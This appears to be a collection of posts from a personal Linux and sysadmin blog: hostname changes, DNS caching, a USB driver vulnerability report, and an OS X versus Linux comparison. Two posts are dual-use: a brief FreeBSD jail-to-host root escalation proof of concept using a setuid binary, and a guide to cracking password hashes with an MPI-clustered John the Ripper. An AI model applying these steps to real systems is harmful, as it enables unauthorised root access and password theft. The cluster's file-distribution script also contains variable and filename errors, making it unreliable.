How to : Change the hostname on Fedora 15

[ad#Google Adsense-1]
Change the entry in /etc/hosts and /etc/sysconfig/network.
If your using network, then Run as root: service network restart
If your using network-manager, then run as root: service NetworkManager restart
[ad#Google Adsense-1]

How to : Change the hostname on Ubuntu 11.04

[ad#Google Adsense-1]
Follow these steps in order to change the hostname on Ubuntu Server
1. Execute sudo hostname host.domain , replace host.domain with your hostname, example: laptop.petur.eu
2. Edit the /etc/hosts file.
3. Edit the /etc/hostname file.
4. Edit the /etc/resolv.conf file if needed.
5. Reboot the server (highly recommenced although not required)
 
[ad#Google Adsense-1]

Rooting FreeBSD , Privilege Escalation using Jails

[ad#Google Adsense-1]

Author:
Pétur Ingi Egilsson <petur@petur.eu>
Description:
A remote user with root privilegs to a FreeBSD jail & user privileges to the jails host machine can obtain root privileges on the host machine.

Affected:
FreeBSD 8.2 – Confirmed
Proof of concept:
From within the jail:
Compile the following using gcc and move resulting executable to /tmp/a.out
#include <stdio.h>
main(){
system(“whoami”);
}
Make sure /tmp/a.out is owned by root and that is has the setuid flag set ( chmod u+s a.out )
From within the jails host as a regular user:
Locate the jails directory structure ( use the command ‘jls’ )
Execute the a.out program
 
Comments?
[ad#Google Adsense-1]

Speed up your Internet browsing on Linux with a DNS Cache server

[ad#Google Adsense-1]
Most Linux distributions, unlike OpenSuSE, OS X and Windows, do not have a DNS Cache service installed by default.
Your computer will need to lookup a website’s IP address every time you visit it. The lookup request is passed on to the DNS server(s) specified in the /etc/resolv.conf file. It will take the server a few ms (milliseconds) at best to respond. It can take a ‘long’ time if your using a slow Internet connection (or a wireless LAN).
Caching DNS acts just like a regular DNS, from the users point of view. The service is configured to respond to lookup requests and return IP addresses. If the Caching DNS does not know the answer to the request, he will simply forward the request to the correct server and then forward the reply to you once it has been received.
So what’s the difference?
An Caching DNS holds a small database of recent requests, or so to speak. He will keep each entry in his database for a specified amount of time  (more about TTL). If the Caching DNS receives a requests for a entry currently in his database, he will respond to it instantly without contacting any other servers. If the Caching DNS is on your local computer, this will occur in 0 milliseconds.
You can check the responce time of your DNS server by running the following command:
dig google.com | grep “Query time”
Let me demonstrate this by running the command two times on two different targets and explain the output.
petur@petur-desktop:/etc$ dig google.com|grep “Query time”
;; Query time: 49 msec
petur@petur-desktop:/etc$ dig google.com|grep “Query time”
;; Query time: 51 msec
Look at the above output. 49 msec (milli seconds) and 51 msec. The small difference between the lookup time for the two requests indicates that the DNS server I’m using has the answer to the request in the cache. Google.com is after all a very popular destination and someone on my campus has probably visited it recently.
What about a site nobody on my campus is likely to visit? I’ll go for australian.jp
petur@petur-desktop:/etc$ dig australian.jp|grep “Query time”
;; Query time: 610 msec
petur@petur-desktop:/etc$ dig australian.jp|grep “Query time”
;; Query time: 46 msec
The first request took 610 msec, that’s because the DNS server I’m using didn’t know the answer to my request and had to contact the DNS in charge of australian.jp (which I guess is located somewhere in Japan).
Now, the second request took only 46 msec, that’s because the DNS I’m using has cached the request and does not have to contact the _Japanese_ server again any time too soon.
When the Caching DNS receives a lookup request, he will first check to see if he has the answer cached, if not he will contact the server responsible for the domain in question.
I would like to shave those 50 msec, by average, off each site I visit on the web.
I’ll show you how this can be done on Ubuntu Linux.
Begin by installing dnsmasq either from “Applications->Ubuntu Software Center” or by using the command sudo apt-get install dnsmasq from the console.
Next you’ll need the change the order of your DNS servers, do this by going to “System->Preferences->Network Connections”
Select the name of the connection you are using and click Edit…
Goto IPv4 Settings
If you have “Method: Manual”, put “127.0.0.1,” (without the quotation marks) in front of whatever it says in your “DNS servers:” field.
If you have “Method: Automatic(DHCP)” -> Change to “Automatic (DHCP) address only” and put “127.0.0.1,8.8.8.8” in the “DNS servers:” field.
8.8.8.8 is Googles DNS server, you might want to replace this with the one provided by your ISP (Internet Service Provider).
Reboot the network-manager service by executing the command sudo service network-manager restart from the command line.
You now have a DNS Caching service running on your computer.
Let me demonstrate the benefit:
petur@petur-desktop:/etc$ dig australian.jp|grep “Query time”
;; Query time: 610 msec
petur@petur-desktop:/etc$ dig australian.jp|grep “Query time”
;; Query time: 0 msec
 
[ad#Google Adsense-1]
Other Linux distrobutions:
1. Install dnsmasq
2. Put “nameserver 127.0.0.1” at the top of your /etc/resolv.conf file
3. You might have to bring your interface down\up using ifconfig or ifdown\ifup

Questions or comments?

How to: Change the hostname on Ubuntu Server

[ad#Google Adsense-1]
Follow these steps in order to change the hostname on Ubuntu Server
1. Execute sudo hostname host.domain , replace host.domain with your hostname, example: laptop.petur.eu
2. Edit the /etc/hosts file.
3. Edit the /etc/hostname file.
4. Edit the /etc/resolv.conf file if needed.
5. Reboot the server (highly recommenced although not required)
 
[ad#Google Adsense-1]

How to flush DNS cache Linux, Mac OS X, Windows

[ad#Google Adsense-1]
To flush DNS cache on Microsoft Windows (Win Vista, Win 7)

Run hte command prompt with Administrator privileges

Type ipconfig /flushdns

To flush the DNS cache on Linux, restart the nscd daemon:-

Linux does not cache dns by default. Some systems might have a dns cahcing service such as nscd. Restarting the DNS caching service will flush the DNS cache.

To restart the nscd daemon, type /etc/rc.d/init.d/nscd restart in your terminal, on Ubuntu or Debian you need to use sudo service nscd instead

To flush the DNS cache in Mac OS X 10.6 Snow Leopard

type dscacheutil -flushcache in the Terminal

 

[ad#Google Adsense-1]

Linux can be hacked with an USB device.

[ad#Google Adsense-1]

A bug in the Caiaq USB driver, which could be used to execute arbitrary at the kernel level has been reported by Rafael Dominguez Vega of MRW InfoSecurity.

The device drivers are vulnerable to buffer overflow condition when an USB device with an unusually long name (over 80 characters) is connected to the machine. This is due to the use of strcpy() which length is not being tested, enabling the attacker to execute malicious code on the target machine.

In order to exploit the vulnerability the attacker would have to have physical access to the target machine. It does not matter how secure a computer is, as long as any human has physical access to it he or she can be manipulated with social engineering techniques such as mailing the victim a maliciously crafted USB chip along a note stating that it contains pictures of him or his family.

Having an encrypted harddrive would not help in such situations as when the user has logged on the machine as the kernel has access to the filesystem.

Fortunately a fix has been released and should hit your distribution repos soon.

 

[ad#Google Adsense-1]

5 Things OS X Does Better than Linux

This article is written with the average user in my mind, be it my girlfriend or my grandmother working on their personal computers without access to an IT department. They don’t know that OS X is built on top of UNIX and in fact I think they don’t care. To them, the command line is something which was used in The Matrix and they have no intentions on buying a book about it.

Linux is, without doubt a good operating system, although I feel more needs to be done to de-alienate it for the average user. I’ve been using Linux as my primary OS for the last 12 years. A few months ago I decided to give OS X a try and since then I’ve been spending more and more time using it.

I’m going to list 5 things i feel OS X does better than Linux, or should I say Ubuntu Linux to be more specific?
[ad#Google Adsense-1]
1. The User Interface

The OS X user interface is beautiful and elegant. Stability is not an issue, the over all experience is of a product which is aimed towards productivity as everything seams to be just a mouse click away.

Developers are expected to follow the “Apple Human Interface Guidelines” , which makes their software GUI simple and friendly for new users, while more experienced users will find advanced and less frequent used functions hidden away under the  File, Edit, etc. buttons.

Installing applications is easy, just drag them to the Applications folder. No need to worry about package dependencies or installing from the command line.

2. Service management

Sharing files, printers and scanners is just a mouse click away. Editing the permissions for those shares can be done from the Share GUI, no need to manually editing configuration files. The same goes for FTP, WWW and SSH and the built in firewall, those can be enabled from the GUI and configured there as well.
[ad#Google Adsense-1]
3. Backup

Backing up your data is without doubt one of the most important tasks you should do regularly on your computer, yet most people are not doing it.
They say it’s to complex and time consuming.

Those people I know, who take backup regularly do it by copying their files manually (on Windows) to an external drive, or use rsync on Linux whenever they feel like it.

Apple tackles this problem with Time Machine, in fact you are asked whether you would like to set it up right after you first login on your new Mac.

Time Machine takes incremental backups of your whole compute every 1 hour either to another hard drive or to Apples Time Capsule (Time Capsules is a network attached storage device). Restoring files or complete backups using the Time Machine is very easy, as expected from Apple.

4. Migration

Buying a new computer is something I do on regular basis. A day or two of setting up and configuring the new machine usually follows. Reinstalling the packages I use and migrating my data.

OS X has a pretty neat utility called ‘Migration Assistant’, which allows you to migrate all your files, folders, applications, and applications settings to a new machine, be it over FireWire, Ethernet or by using an external disk.

This is much better compared to rsync and apt-get, as you don’t need to have any knowledge of the command line utilities, the file system hierarchy or package managers.

The Migration Assistant GUI is very easy to use and takes you through the whole process step by step, describing each step in layman terms.

[ad#Google Adsense-1]
5. Flash

Adobe Flash is a problem on Linux, your machine might be fast enough so it doesn’t bother you but still it uses up a lot of the cpu.

I’m sick and tired of listening to the cpu fan grinding like there is no tomorrow on my Ubuntu Laptop every time I visit youtube, play flash games in my browser or visit a website which has flash ads.

As this is not the case with Flash on OS X, I decided to list it here. Be it Adobes fault or not, I’m a computer user and I expect things to just work.

Conclusion

OS X is a very powerful UNIX environment aimed towards the average user. New users will enjoy the elegant user interface while not having to worry about loss of data, stability issues or viruses. Reboots are rare and the power saving features of the OS are excellent, Apple wants developers to make a note of this and informs them that they should design their applications to run for days or even weeks without the user having to restart them.

It is easy to share files and printers with others, while being confident about permissions and restrictions.

Migrating all your settings and applications to a new Mac, once the current one comes closer to it’s end of life, is easy enough to be performed by the average grandmother.

More advanced users will appreciate the power of the underlying UNIX which comes with the most popular unix commands. Those looking for more command line programs should take a look at “The MacPorts Project” founds at www.marports.com

Do you have anything to add?

How-to: John the Ripper on a Ubuntu 10.04 MPI Cluster

[ad#Google Adsense-1]
In this post I show step-by-step how you can setup your own “Super computer cluster” using Ubuntu MPI Cluster from multiple machines with the goal of bruteforcing strong encrypted passwords with John the Ripper for academic purposes.

Owners of quad core machines will also benefit from this setup as the “john” binaries found in the Ubuntu Repositories are compiled to run on only one core. I managed to decrease the time required to crack password hashes using this setup.

The post is meant to be plain and simple aimed towards the average user, thus I choose not to implement NIS, NFS, BIND, and other more complex technologies. A student should be able to setup and play with a computer cluster system at home without spend days reading through Linux systems-administrators books and manuals. I make use of Ubuntu 10.04 Server as it is the most commonly used available Linux distribution today and it’s a LTS (Long Term Support) version, which will be supported till 2015.

I suggest “MPI Programming” as the google keyword for those interested in learning how-to write programs for such systems.

If you have any suggestions, problems, comments or would like to contribute to this document leave a comment or email me.

Foreword

First of all I must state that I’m no expert on MPICH, this guide is written by an hobbyist.

The cluster implementation presented in this paper is not meant for environments where high availability and security is an issue.

History

I found myself in a situation where I had to break up an old password of mine. Having a couple of computers around I started looking for a way to get them all working together.

This paper is the result of extreme frustration, an overdose of coffee and a sleepless night.

Requirements

At least two networked computers running Ubuntu Linux version 10.04.

John does not require much bandwidth.

Configuring the Server

Requirements

A static IP address or a reserved IP in DHCP.

Required packages

The following packages are required:

  • libmpich1.0-dev  —  mpich static libraries and development files
  • libmpich-mpd1.0-dev — mpich static libraries and development files
  • libmpich-shmem1.0-dev — mpich static libraries and development files
  • openssh-server — secure shell (SSH) server, for secure access from remote machines
  • mpich2 — Implementation of the MPI Message Passing Interface standard
  • mpich2-doc — Documentation for MPICH2
  • john — active password cracking tool
  • build-essentials — Informational list of build-essential packages

petur@server:~$ sudo apt-get install libmpich1.0-dev libmpich-mpd1.0-dev libmpich-shmem1.0-dev mpich2 mpich2-doc john openssh-server build-essentials

Network configuration

By default the /etc/hosts file looks like this:

127.0.0.1 localhost
127.0.1.1 server.petur.eu server

# The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

You need to change the 127.0.1.1 to your IP address.

<server.petur.eu> should be your FQDN and <server> is your machines hostname.

Find your IP by executing:
petur@server:~$ ifconfig|grep “inet addr”

inet addr:10.0.0.1 Bcast:10.255.255.255 Mask:255.0.0.0
inet addr: 127.0.0.1 Mask:255.0.0.0

/etc/hosts should look like this after you have changed it:

127.0.0.1 localhost
10.0.0.1 server.petur.eu server
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

User configuration

Create a new user called ‘cluster’ and add ~/bin/ to his path.

I find it most convenient to use the same pass for ‘cluster’ on every machine.

petur@server:~$ sudo useradd -m -s /bin/bash cluster
petur@server:~$ sudo passwd cluster

Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

petur@server:~$ sudo su – cluster -c “mkdir ~/bin;export PATH=~/bin:$PATH”

Configuring MPICH

MPI makes use of the following configuration files:

• ~/.mpd.conf

NOTE: The file begins with a .

This file must be chmod 600

The this file contains a single line “secretword=<password>” (replace <password> with your password, which must be the same in all ~/.mpd.conf in the cluster).

• ~/mpd.hosts

Contains the list of all nodes in the cluster, including the server.
The format of the file is “host:number-of-cpu-cores”, fx. 10.0.0.2:4 if 10.0.0.2 has 4 cores.

The number of cores can be set lower than the actual core number if you only want MPICH to use a specific number of cores without regard to the number of available cores.

For an example, if the server has a quad core processor you might want to set the value to :3 instead of :4 so the server can be used for something else.

DO NOT use localhost or 127.0.0.1, you MUST use a network reachable IP.

Check the number of cores available, and create the configuration files.

cluster@server:~$ touch ~/.mpd.conf
cluster@server:~$ chmod 600 ~/.mpd.conf
cluster@server:~$ echo secretword=pass>~/.mpd.conf
cluster@server:~$ /sbin/ifconfig|grep “inet addr”
inet addr:10.0.0.1 Bcast:10.255.255.255 Mask:255.0.0.0
inet addr:127.0.0.1 Mask:255.0.0.0
cluster@server:~$ cat /proc/cpuinfo|grep processor|wc -l
1
cluster@server:~$ echo 10.0.0.1:1>~/mpd.hosts
Check if everything is in order by executing the following commands.

• mpdboot – start the cluster
• mpdtrace –  list all nodes in the cluster
• mpdallexit – shut down the cluster

cluster@server:~$ mpdboot
cluster@server:~$ mpdtrace
server
cluster@server:~$ mpdallexit

If the commands executed without any errors then your all set, if not then review the permissions on your ~/.mpd.conf, review your /etc/hosts and the contents of your ~/mpd.hosts

Installing John the Ripper

An MPI patched John the Ripper version can be found at www.bindshell.net/tools/johntheripper

cluster@server:~$ mkdir source
cluster@server:~$ cd source
cluster@server:~/source$ wget http://www.bindshell.net/tools/johntheripper/john-1.7.2-bp17-mpi8.tar.gz

Unpack it and run make from the src directory (use make|less if your resolution is too small)

cluster@server:~/source$ tar -zxf john-1.7.2-bp17-mpi8.tar.gz
cluster@server:~/source$ cd john-1.7.2-bp17-mpi8/src/
cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ make

You will be presented with a list of options.

To build John the Ripper, type

make clean SYSTEM

where SYSTEM can be one of the following:
linux-x86-mmx Linux, x86 with MMX
linux-x86-sse Linux, x86 with SSE2 (best)
linux-x86-any Linux, x86
linux-x86-64 Linux, AMD x86-64, 64-bit native w/SSE2 (best)
linux-x86-64-mmx Linux, AMD x86-64, 32-bit with MMX

I’ve found linux-x86-sse2 to give the best performance on my intel based workstation.

cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ make clean linux-x86-sse2

If the programs compiles OK check if it works

cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ ../run/john -format=DES -test

Benchmarking: Traditional DES [128/128 BS SSE2]… DONE
Many salts: 1994K c/s real, 1994K c/s virtual
Only one salt: 1658 c/s real, 1654K c/s virtual

Move your newly compiled executables to ~/bin

cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ mv ../run/* ~/bin

Run john and make sure you have the _mpi version.

If it does not then something is wrong with your PATH.

cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ john|grep version

John the Ripper password cracker, version 1.7.2_bp17_mpi

Configuring extra nodes

Do the following each time you add a new node to the cluster.

This particular node has the IP address 10.0.0.2

Pre requirements

A static IP address or a reserved IP in DHCP.

Network configuration

Follow the same instructions as for the server, but of course use the correct IP address.

Required packages

Same as on the server.

User configuration

Choose the same password for ‘cluster’ as you did on the server.

petur@node1:~$ sudo useradd -m -s /bin/bash cluster
petur@node1:~$ sudo passwd cluster
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
petur@node1:~$ sudo su – cluster -c “mkdir ~/bin;export PATH=~/bin:$PATH”
[ad#Google Adsense-1]

Configuring MPICH

The following commands are to be executed from the server and not on the new node.

Configure password less SSH from the server to the node.

cluster@server:~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/cluster/.ssh/id_rsa):
Created directory ‘/home/cluster/.ssh’
Enter passpharse (empty for no passpharse):
Enter same passpharse again:
Your identification has been saved in /home/cluster/.ssh/id_rsa.
Your public key has been saved in /home/cluster/.ssh/id_rsa.pub.
The key fingerprint is:
0f:d7:c4:14:cf:06:11:d5:80:ec:1f:c3:f3:3b:7f:22 cluster@server
The key’s randomart image is:
[picture omitted]

cluster@server:~$ ssh cluster@10.0.0.2 mkdir -p .ssh
cluster@10.0.0.2’s password:

cluster@server:~$ cat .ssh/id_rsa.pub | ssh cluster@10.0.0.2 ‘cat>>.ssh/authorized_keys’

cluster@10.0.0.2’s password:

cluster@server:~$ ssh cluster@10.0.0.2 ‘cat /proc/cpuinfo|grep processor|wc -l’
2
cluster@server:~$ echo 10.0.0.2:2 >> ~/mpd.hosts

cluster@server:~$  for i in `cut –delimiter=: -f1 ~/mpd.hosts`;do scp ~/.mpd.conf cluster@$i:~;scp
~/mpd.hosts cluster@$i:~;done

The authenticity of host ‘10.0.0.1 (10.0.0.1)’ can’t be established.
RSA key fingerprint is 2d:94:c6:40:b0:02:04:d9:86:c8:16:f3:e6:a7:9f:35.
Are you sure you want to countinue connecting (yes/no)? Yes
Warning: Permanently added ‘10.0.0.1’ (RSA) to the list of known hosts.

cluster@10.0.0.1’s password:
mpd.conf 100% 16 0.0KB/s 00:00.
cluster@10.0.0.1’s password:
mpd.hosts 100% 22 0.0KB/s 00:00
mpd.conf 100% 16 0.0KB/s 00:00.
mpd.hosts 100% 22 0.0KB/s 00:00

Now add the line:
10.0.0.2 node1

to the /etc/hosts file on the server.

The final step is to replace the /etc/hosts on ALL of the node machines with the new /etc/hosts from the server. If this is not done then the following error will be shown when you try to boot the cluster

mpdboot_server (handle_mpd_output 407): failed to handshake with mpd on 10.0.0.2; recvd
output={}

Installing John the Ripper

Same as on the server.

Basic commands

Boot up the cluster using ‘mpdboot –verbose –ncpus=1 -n 2′

• –verbose :: gives us better overview of what’s going on in case of a failure.
• –ncpus=1 :: tells the server machine to assign 1 core to the cluster.
• -n 2 :: use 2 computer (server + 1 node).

NOTE, there are two dashes (-) in front of verbose and ncpus

cluster@server:~$ mpdboot –verbose –ncpus=1 -n 2
running mpdallexit on server
LAUNCHED mpd on server via
RUNNING: mpd on server
LAUCNHED mpd on 10.0.0.2 via server
RUNNING: mpd on 10.0.0.2

Check if the cluster is working:

mpdtrace – lists all the nodes in the cluster

mpiexec -np 3 hostname, means “run the hostname command using three cores”

cluster@server:~$ mpdtrace
server
node1

cluster@server:~$ mpiexec -np 3 hostname
server
node1
node1

mpdallexit – Shuts down the cluster

cluster@server:~$ mpdallexit

Using the MPI cluster to crack passwords.

I’ll use a simple MD5 hash as an example.

cluster@server:~$ echo user:47584a15f1ba6c65da3a2ef8e43e606b > crackme1.md5
cluster@server:~$ mpdboot –ncpus=2 -n 2boo

The next two lines must be entered together in one single line.
cluster@server:~$ for i in `cut –delimiter=: -f1 ~/mpd.hosts`;do scp ~/crackme1.mp5
cluster@$1:~;done

The above command used to distribute files to the cluster can be easily scripted.

— distributer.sh begins —

#!/bin/bash

# usage: ./distributer.sh filename

for x in `cut –delimiter=: -f1 ~/mpd.hosts`;do scp $1 cluster@$i:~;done

— distributer.sh ends —

Use ctrl+c once the password has been found.

cluster@server:~$ mpiexec -np 3 john –format:raw-MD5 crackme1.md5

Loaded 1 password hash (Raw MD5 [raw-md5 SSE2])
Loaded 1 password hash (Raw MD5 [raw-md5 SSE2])
Loaded 1 password hash (Raw MD5 [raw-md5 SSE2])

petur1 (user)

Process 2 completed loop.

Threat: 2 guesses: 1 time 0:00:00:02 (3) c/s: 5616K trying: petciL – petusc

^Ccluster@server:~$

Remember to shutdown the cluster service after use

cluster@server:~$ mpdallexit

Download this article as PDF here: [ENGLISH] [ICELANDIC]

[ad#Google Adsense-1]]